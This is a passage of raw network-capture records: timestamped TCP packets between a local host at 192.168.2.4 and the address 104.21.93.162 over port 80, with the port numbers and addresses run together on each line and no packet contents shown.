                                                                                                                              Dec 26, 2024 17:18:17.578174114 CET8049847104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:17.578258991 CET4984780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:17.578418970 CET4984780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:17.669034958 CET8049840104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:17.669095039 CET4984080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:17.697880983 CET8049847104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:17.802299023 CET4984680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:17.922282934 CET8049846104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:17.922322989 CET8049846104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:17.927375078 CET4984780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:18.047224998 CET8049847104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:18.047266006 CET8049847104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:18.047383070 CET8049847104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:18.634217978 CET8049846104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:18.677349091 CET4984680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:18.756412029 CET8049847104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:18.802329063 CET4984780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:18.905492067 CET8049846104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:18.958492994 CET4984680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:19.009543896 CET8049847104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:19.052233934 CET4984780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:19.184974909 CET4984680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:19.185157061 CET4984780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:19.185679913 CET4984880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:19.489727020 CET4984680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:19.489728928 CET4984780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:19.748042107 CET8049848104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:19.748102903 CET8049846104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:19.748106003 CET4984880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:19.748161077 CET8049847104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:19.748524904 CET8049846104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:19.748574972 CET4984680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:19.748641014 CET8049847104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:19.748684883 CET4984780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:19.749393940 CET4984880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:19.868927002 CET8049848104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:19.975251913 CET4985480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:19.975320101 CET4984880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:20.094898939 CET8049854104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:20.094959021 CET4985480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:20.095247984 CET4985480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:20.115006924 CET4985580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:20.139429092 CET8049848104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:20.214678049 CET8049854104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:20.234642029 CET8049855104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:20.234705925 CET4985580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:20.234801054 CET4985580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:20.354274988 CET8049855104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:20.443094015 CET4985480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:20.562836885 CET8049854104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:20.562880993 CET8049854104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:20.583687067 CET4985580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:20.703389883 CET8049855104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:20.703403950 CET8049855104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:20.703418970 CET8049855104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:20.718513012 CET8049848104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:20.721366882 CET4984880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:21.275500059 CET8049854104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:21.317872047 CET4985480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:21.412446976 CET8049855104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:21.458498955 CET4985580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:21.529951096 CET8049854104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:21.583491087 CET4985480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:21.665853977 CET8049855104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:21.708529949 CET4985580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:22.020227909 CET4985480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:22.020296097 CET4985580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:22.050484896 CET4985780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:22.140188932 CET8049854104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:22.140259981 CET4985480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:22.140778065 CET8049855104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:22.140826941 CET4985580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:22.170058012 CET8049857104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:22.170124054 CET4985780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:22.182106972 CET4985780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:22.301642895 CET8049857104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:22.536703110 CET4985780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:22.538559914 CET4986280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:22.656636000 CET8049857104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:22.656667948 CET8049857104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:22.656713009 CET8049857104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:22.658067942 CET8049862104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:22.658128977 CET4986280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:22.658243895 CET4986280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:22.777791023 CET8049862104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:23.005599976 CET4986280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:23.125377893 CET8049862104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:36.322590113 CET8049899104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:36.380486965 CET4989980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.573695898 CET8049899104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:36.614799023 CET4989980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.710114002 CET4989880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.710164070 CET4989980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.710916042 CET4990580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.830492973 CET8049905104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:36.830653906 CET4990580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.830749035 CET4990580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.830761909 CET8049898104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:36.830831051 CET4989880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.830949068 CET8049899104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:36.831001043 CET4989980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.850162983 CET4990680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.950710058 CET8049905104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:36.970168114 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:36.970242977 CET4990680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.970320940 CET4990680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:37.089906931 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:37.177422047 CET4990580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:37.299699068 CET8049905104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:37.299768925 CET8049905104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:37.299798965 CET8049905104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:37.318070889 CET4990680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:37.437980890 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:37.438014030 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:38.008965969 CET8049905104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:38.052297115 CET4990580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:38.149158955 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:38.192929983 CET4990680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:38.262115955 CET8049905104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:38.302290916 CET4990580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:38.579509974 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:38.579664946 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:38.579716921 CET4990680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:38.728148937 CET4990580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:38.728271961 CET4990680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:38.848088026 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:38.848417997 CET8049905104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:38.848491907 CET4990580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:39.061249018 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:39.061434984 CET4990680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:39.181955099 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:39.181987047 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:39.182022095 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:39.579225063 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:39.599834919 CET4990680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:39.600544930 CET4991280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:39.703912020 CET4991380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:39.719854116 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:39.719938993 CET4990680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:39.720094919 CET8049912104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:39.720164061 CET4991280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:39.720262051 CET4991280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:39.823728085 CET8049913104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:39.823828936 CET4991380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:39.825892925 CET4991380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:39.839814901 CET8049912104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:39.945653915 CET8049913104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:40.068140984 CET4991280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:40.177405119 CET4991380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:40.188564062 CET8049912104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:40.188673973 CET8049912104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:40.297118902 CET8049913104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:40.297137976 CET8049913104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:40.297159910 CET8049913104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:40.897283077 CET8049912104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:40.942914009 CET4991280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.001554012 CET8049913104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:41.067914963 CET4991380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.149702072 CET8049912104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:41.192914009 CET4991280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.253739119 CET8049913104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:41.302299023 CET4991380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.497581959 CET4991280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.497639894 CET4991380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.498364925 CET4991980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.617966890 CET8049919104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:41.618032932 CET4991980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.618165016 CET4991980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.626816034 CET8049912104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:41.626847982 CET8049913104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:41.626862049 CET4991280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.626895905 CET4991380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.737720966 CET8049919104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:41.974330902 CET4991980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:42.069330931 CET4992080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:42.095406055 CET8049919104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:42.095423937 CET8049919104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:42.095437050 CET8049919104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:42.192243099 CET8049920104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:42.195386887 CET4992080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:42.195533037 CET4992080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:42.315010071 CET8049920104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:42.552436113 CET4992080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:42.672344923 CET8049920104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:42.672374010 CET8049920104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:42.795603991 CET8049919104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:42.849160910 CET4991980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:43.285592079 CET8049919104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:43.333524942 CET4991980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:43.374866962 CET8049920104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:43.427287102 CET4992080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:43.435101986 CET8049919104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:43.436470985 CET4991980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:43.488003969 CET4991980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:43.590105057 CET4992280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:43.607925892 CET8049919104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:43.609452963 CET4991980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:43.625386000 CET8049920104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:43.677283049 CET4992080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:43.709908009 CET8049922104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:43.713586092 CET4992280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:43.717396975 CET4992280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:43.836921930 CET8049922104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:44.068008900 CET4992280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:44.187815905 CET8049922104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:44.187851906 CET8049922104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:44.187935114 CET8049922104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:44.506572962 CET4992080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:44.507762909 CET4992780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:44.817915916 CET4992080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:44.845474005 CET8049927104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:44.845752001 CET4992780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:44.845799923 CET4992780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:44.845803976 CET8049920104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:44.845887899 CET4992080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:44.891454935 CET8049922104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:44.937874079 CET8049920104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:44.943011999 CET4992280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:44.965400934 CET8049927104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:45.149710894 CET8049922104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:45.192915916 CET4992280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:45.193017960 CET4992780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:45.265377045 CET4992280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:45.266058922 CET4992880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:45.312680960 CET8049927104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:45.312827110 CET8049927104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:45.386312962 CET8049922104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:45.386385918 CET4992280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:45.386893034 CET8049928104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:45.387000084 CET4992880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:45.387126923 CET4992880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.067847013 CET8049961104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:58.115392923 CET4996180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.146224976 CET8049960104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:58.325517893 CET8049961104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:58.380440950 CET4996080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.380443096 CET4996180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.440989971 CET4996080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.440990925 CET4996180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.443388939 CET4996680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.561167002 CET8049960104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:58.561650991 CET8049961104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:58.561744928 CET4996080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.561749935 CET4996180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.562952042 CET8049966104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:58.563047886 CET4996680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.563220024 CET4996680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.682703018 CET8049966104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:58.867372990 CET4996880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.911910057 CET4996680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.986928940 CET8049968104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:58.986994028 CET4996880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.987138987 CET4996880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:59.031615019 CET8049966104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:59.031627893 CET8049966104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:59.031636953 CET8049966104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:59.106921911 CET8049968104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:59.333756924 CET4996880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:59.453500986 CET8049968104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:59.453542948 CET8049968104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:59.740767002 CET8049966104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:59.841703892 CET4996680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:00.235456944 CET8049966104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:00.235542059 CET8049968104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:00.235574961 CET8049966104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:00.238207102 CET4996680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:00.286705971 CET4996880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:00.363387108 CET4996680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:00.363389969 CET4997180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:00.417484045 CET8049968104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:00.459163904 CET4996880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:00.482952118 CET8049971104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:00.483072042 CET4997180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:00.483310938 CET4997180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:00.483359098 CET8049966104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:00.483573914 CET4996680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:00.604106903 CET8049971104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:00.833734035 CET4997180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:00.953378916 CET8049971104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:00.953434944 CET8049971104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:00.953483105 CET8049971104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:01.115629911 CET4996880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:01.116643906 CET4997480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:01.235430002 CET8049968104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:01.235477924 CET4996880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:01.236176968 CET8049974104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:01.236257076 CET4997480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:01.236841917 CET4997480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:01.356352091 CET8049974104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:01.588527918 CET4997480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:01.661772966 CET8049971104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:01.708678007 CET4997180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:01.709075928 CET8049974104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:01.709132910 CET8049974104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:01.913671017 CET8049971104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:01.965584040 CET4997180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:02.375240088 CET4997180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:02.375958920 CET4997680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:02.417151928 CET8049974104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:02.458570004 CET4997480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:02.495166063 CET8049971104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:02.495223999 CET4997180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:02.495502949 CET8049976104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:02.495560884 CET4997680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:02.495732069 CET4997680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:02.615302086 CET8049976104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:02.697639942 CET8049974104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:02.739819050 CET4997480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:02.849327087 CET4997680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:02.969027996 CET8049976104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:02.969039917 CET8049976104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:02.969049931 CET8049976104.21.93.162192.168.2.4
